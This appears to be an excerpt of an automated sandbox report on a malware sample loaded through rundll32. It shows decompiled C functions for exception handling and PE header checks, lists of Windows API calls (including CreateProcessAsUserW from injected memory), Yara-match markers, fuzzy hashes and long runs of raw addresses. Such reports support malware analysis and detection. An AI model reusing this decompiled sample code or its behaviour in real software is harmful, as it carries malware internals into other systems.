                          0x01004e1f
                          0x01004e2f
                          0x01004e32
                          0x01004e4a
                          0x01004e4d
                          0x01004e67
                          0x01004e6a
                          0x01004e82
                          0x01004e85
                          0x01004e9b
                          0x01004e9e
                          0x01004eb6
                          0x01004eb9
                          0x01004ed1
                          0x01004ed4
                          0x01004eee
                          0x01004ef1
                          0x01004f07
                          0x01004f0a
                          0x01004f22
                          0x01004f25
                          0x01004f3f
                          0x01004f42
                          0x01004f5a
                          0x01004f5d
                          0x01004f73
                          0x01004f76
                          0x01004f8e
                          0x01004f91
                          0x01004fa9
                          0x01004fac
                          0x01004fbe
                          0x01004fc1
                          0x01004fd3
                          0x01004fd6
                          0x01004fe8
                          0x01004feb
                          0x01004fef
                          0x01004fff
                          0x01005002
                          0x01005010
                          0x01005013
                          0x01005025
                          0x01005028
                          0x0100503c
                          0x0100503f
                          0x01005041
                          0x01005051
                          0x01005054
                          0x01005066
                          0x01005069
                          0x01005077
                          0x0100507a
                          0x0100508c
                          0x0100508f
                          0x01005093
                          0x010050a3
                          0x010050a6
                          0x010050b8
                          0x010050bb
                          0x010050c9
                          0x010050cc
                          0x010050de
                          0x010050e1
                          0x010050f3
                          0x010050f6
                          0x0100510a
                          0x0100510d
                          0x01005121
                          0x01005124
                          0x01005138
                          0x0100513b
                          0x0100514f
                          0x01005152
                          0x01005166
                          0x01005169
                          0x0100517d
                          0x01005182
                          0x01005194
                          0x01005197
                          0x010051ab
                          0x010051ae
                          0x010051c2
                          0x010051c5
                          0x010051db
                          0x010051de
                          0x010051f2
                          0x010051f5
                          0x01005207
                          0x0100520a
                          0x0100521e
                          0x01005221
                          0x01005235
                          0x01005238
                          0x0100524c
                          0x01005255
                          0x01005258
                          0x01005261
                          0x0100526a
                          0x01005272
                          0x0100527a
                          0x01005284
                          0x01005299

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                          • Instruction ID: e7cd48525948bd0ceea5e2f43cbd50dd17e57e1751a7408f2f78d3a398fb6385
                          • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                          • Instruction Fuzzy Hash: AE22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B667CA Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 67e13545a416f6b65bb087223d9dbd59c0a631b2fa708ba121c1bc66d7185187
                          • Instruction ID: 7abebeb59a3d40f7250fe4f76ae59556c7fe63776046687e656a87fa36139870
                          • Opcode Fuzzy Hash: 67e13545a416f6b65bb087223d9dbd59c0a631b2fa708ba121c1bc66d7185187
                          • Instruction Fuzzy Hash: 44429E34A04B45CFCB25CF69C491ABAB7F2FF49304F5885AED49A9B651D738B486CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010084C1 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010084C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x100a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100a3c8 = 1;
										__eflags =  *0x100a3c8;
										if( *0x100a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x100a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x100a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x100a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x100a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100a3c8 = 1;
							__eflags =  *0x100a3c8;
							if( *0x100a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x100a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x100a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                          0x010084cb
                          0x010084ce
                          0x010084d4
                          0x010084f2
                          0x00000000
                          0x010084f2
                          0x010084dc
                          0x010084e5
                          0x010084eb
                          0x010084fa
                          0x010084fd
                          0x01008500
                          0x0100850a
                          0x0100850a
                          0x0100850c
                          0x0100850f
                          0x01008511
                          0x01008511
                          0x01008513
                          0x01008516
                          0x00000000
                          0x00000000
                          0x01008518
                          0x0100851a
                          0x01008580
                          0x01008580
                          0x010086de
                          0x00000000
                          0x010086de
                          0x0100851c
                          0x0100851c
                          0x01008520
                          0x01008522
                          0x01008522
                          0x01008522
                          0x01008522
                          0x01008525
                          0x01008526
                          0x01008529
                          0x01008529
                          0x0100852d
                          0x01008531
                          0x0100853f
                          0x0100853f
                          0x01008547
                          0x0100854d
                          0x0100854f
                          0x01008551
                          0x01008561
                          0x0100856e
                          0x01008572
                          0x01008577
                          0x01008579
                          0x010085f7
                          0x010085f7
                          0x0100857b
                          0x0100857b
                          0x0100857b
                          0x010085f9
                          0x010085fb
                          0x010086dc
                          0x010086dc
                          0x00000000
                          0x01008601
                          0x01008601
                          0x01008608
                          0x00000000
                          0x00000000
                          0x0100860e
                          0x01008612
                          0x0100866e
                          0x01008670
                          0x01008678
                          0x0100867a
                          0x0100867c
                          0x00000000
                          0x00000000
                          0x0100867e
                          0x01008684
                          0x01008686
                          0x01008688
                          0x0100869d
                          0x0100869d
                          0x0100869f
                          0x010086ce
                          0x010086d5
                          0x00000000
                          0x010086d5
                          0x010086a3
                          0x010086a4
                          0x010086a6
                          0x010086a8
                          0x010086a8
                          0x010086aa
                          0x010086ac
                          0x010086ae
                          0x010086c2
                          0x010086c2
                          0x010086c5
                          0x010086c7
                          0x010086c7
                          0x010086c8
                          0x010086c8
                          0x00000000
                          0x010086b0
                          0x010086b0
                          0x010086b0
                          0x010086b9
                          0x010086ba
                          0x010086bc
                          0x010086be
                          0x010086be
                          0x00000000
                          0x010086b0
                          0x010086ae
                          0x0100868a
                          0x01008691
                          0x01008691
                          0x01008693
                          0x00000000
                          0x00000000
                          0x01008695
                          0x01008696
                          0x01008699
                          0x0100869b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0100869b
                          0x00000000
                          0x01008691
                          0x01008614
                          0x01008617
                          0x0100861c
                          0x00000000
                          0x00000000
                          0x01008625
                          0x01008627
                          0x0100862d
                          0x00000000
                          0x00000000
                          0x01008633
                          0x01008639
                          0x00000000
                          0x00000000
                          0x0100863f
                          0x01008641
                          0x0100864a
                          0x0100864e
                          0x00000000
                          0x00000000
                          0x01008654
                          0x01008657
                          0x01008659
                          0x00000000
                          0x00000000
                          0x01008660
                          0x01008662
                          0x00000000
                          0x00000000
                          0x01008664
                          0x01008668
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01008668
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01008553
                          0x01008553
                          0x01008553
                          0x0100855a
                          0x00000000
                          0x00000000
                          0x0100855c
                          0x0100855d
                          0x0100855f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0100855f
                          0x01008587
                          0x01008589
                          0x00000000
                          0x00000000
                          0x01008599
                          0x0100859b
                          0x0100859d
                          0x00000000
                          0x00000000
                          0x010085a3
                          0x010085aa
                          0x010085d6
                          0x010085d6
                          0x010085d8
                          0x010085da
                          0x010085ee
                          0x010085f0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010085dc
                          0x010085dc
                          0x010085dc
                          0x010085e5
                          0x010085e6
                          0x010085e8
                          0x010085ea
                          0x010085ea
                          0x00000000
                          0x010085dc
                          0x010085ac
                          0x010085ac
                          0x010085af
                          0x010085b1
                          0x010085c3
                          0x010085c3
                          0x010085c6
                          0x010085c8
                          0x010085c8
                          0x010085c9
                          0x010085c9
                          0x010085cf
                          0x010085cf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010085b3
                          0x010085b3
                          0x010085b3
                          0x010085ba
                          0x00000000
                          0x00000000
                          0x010085bc
                          0x010085bc
                          0x010085bd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010085bd
                          0x010085bf
                          0x010085c1
                          0x010085d4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010085d4
                          0x00000000
                          0x010085c1
                          0x01008533
                          0x01008536
                          0x01008539
                          0x00000000
                          0x00000000
                          0x0100853b
                          0x0100853d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0100853d
                          0x01008502
                          0x01008504
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01008572
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: MemoryQueryVirtual
                          • String ID:
                          • API String ID: 2850889275-0
                          • Opcode ID: 38f9d8921482af1e89be049d0bea91984d954c97cabec6591085a7431a2c48aa
                          • Instruction ID: 12a5b7b367863828caf4b1272f86d2a79372913995fc2b5ae7030fd1b6b52531
                          • Opcode Fuzzy Hash: 38f9d8921482af1e89be049d0bea91984d954c97cabec6591085a7431a2c48aa
                          • Instruction Fuzzy Hash: 9C619270F007068FFB6B8A2CC89066977E1BB45355F29C4ABE5C6C72C9EB76D8428740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B78E57 Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05B78EC7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateProcessUser
                          • String ID:
                          • API String ID: 2217836671-0
                          • Opcode ID: 79525825f026253d4b3980c8f973230ec0b957ce4d0b12f4d3428ac43aed7204
                          • Instruction ID: 6c25f95ded713b61fb77276f3693847cbb513420b89e33b5e90a65bafe1bdb56
                          • Opcode Fuzzy Hash: 79525825f026253d4b3980c8f973230ec0b957ce4d0b12f4d3428ac43aed7204
                          • Instruction Fuzzy Hash: BD11DF3221414DBFDF029E98DD05DEA7FAAFF08364B095255FA2962160C732E871EB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B636BB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                          Download Yara Rule
                          APIs
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B636D3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorStatus
                          • String ID:
                          • API String ID: 1596131371-0
                          • Opcode ID: 7037712361cf1c8c102aa318d0f7beb717552da75a1690c78f592676cd20581e
                          • Instruction ID: e7edaedfe807a7d351c5d642d8f93a6619c42a12589a0c2100464082f732f295
                          • Opcode Fuzzy Hash: 7037712361cf1c8c102aa318d0f7beb717552da75a1690c78f592676cd20581e
                          • Instruction Fuzzy Hash: 8EC01236509202BBDF195A50D82993A7E52EB50340F005818B14682060CE35B450D700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B83DB0 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                          • Instruction ID: 29b9c5f7282485957f25ca3895f0131a7fb1518da1043a989f667394e27e070a
                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                          • Instruction Fuzzy Hash: 5B21A472A04204ABCB10EF68CCC497BB7E5FF44710B0589A9D9568B245E730F915C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100829C Relevance: .1, Instructions: 77COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E0100829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E01008407(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E010084C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E010083AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E01008407(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E010084A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                          0x010082a0
                          0x010082a1
                          0x010082a2
                          0x010082a5
                          0x010082a7
                          0x010082aa
                          0x010082ab
                          0x010082ad
                          0x010082ae
                          0x010082af
                          0x010082b2
                          0x010082bc
                          0x0100836d
                          0x01008374
                          0x0100837d
                          0x010082c2
                          0x010082c2
                          0x010082c8
                          0x010082ce
                          0x010082d1
                          0x010082d4
                          0x010082d8
                          0x010082dd
                          0x010082e2
                          0x01008362
                          0x00000000
                          0x010082e4
                          0x010082e4
                          0x010082f0
                          0x010082f2
                          0x0100834d
                          0x0100834d
                          0x01008353
                          0x00000000
                          0x010082f4
                          0x01008303
                          0x01008305
                          0x01008306
                          0x01008307
                          0x0100830a
                          0x0100830a
                          0x0100830c
                          0x00000000
                          0x0100830e
                          0x0100830e
                          0x01008358
                          0x01008310
                          0x01008310
                          0x01008314
                          0x0100831c
                          0x01008321
                          0x01008326
                          0x01008332
                          0x0100833a
                          0x01008341
                          0x01008347
                          0x0100834b
                          0x00000000
                          0x0100834b
                          0x0100830e
                          0x0100830c
                          0x00000000
                          0x010082f2
                          0x01008366
                          0x01008366
                          0x01008366
                          0x010082e2
                          0x01008382
                          0x01008389

                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                          • Instruction ID: 5fbfcd26009affd3733bd8b36ad05602bf18abcc05a06ef6c39ef491a3bb30e0
                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                          • Instruction Fuzzy Hash: 8421D872D002059FEB15DF68C8808ABBBA5FF84310F0AC5A9D9959B295EB30F915C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B637C2 Relevance: 54.4, APIs: 36, Instructions: 424synchronizationtimethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B75C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05B75C5C
                            • Part of subcall function 05B75C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B75D1D
                            • Part of subcall function 05B75C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D26
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 05B63860
                            • Part of subcall function 05B6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                            • Part of subcall function 05B6A976: CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                            • Part of subcall function 05B6A976: GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                            • Part of subcall function 05B6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                            • Part of subcall function 05B6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 05B638C3
                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 05B6393F
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B63961
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 05B639A1
                            • Part of subcall function 05B6F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 05B6F0B0
                            • Part of subcall function 05B6F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,05B63899,?), ref: 05B6F0DE
                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05B63A47
                          • CloseHandle.KERNEL32(?), ref: 05B63CD6
                            • Part of subcall function 05B6E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,05B63A69,?), ref: 05B6E2F2
                            • Part of subcall function 05B6E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05B63A69,?), ref: 05B6E320
                            • Part of subcall function 05B6E2E6: ResetEvent.KERNEL32(?,?,?,?,?,05B63A69,?), ref: 05B6E33A
                          • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 05B63A7C
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63A8B
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63AB8
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63AD2
                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 05B63B1A
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05B63B34
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B63B4A
                          • ReleaseMutex.KERNEL32(?), ref: 05B63B67
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63B78
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63B87
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63BBB
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63BD5
                          • SwitchToThread.KERNEL32 ref: 05B63BD7
                          • ReleaseMutex.KERNEL32(?), ref: 05B63BE1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C1F
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C2A
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63C4D
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63C67
                          • SwitchToThread.KERNEL32 ref: 05B63C69
                          • ReleaseMutex.KERNEL32(?), ref: 05B63C73
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C88
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63CEA
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63CF6
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D02
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D0E
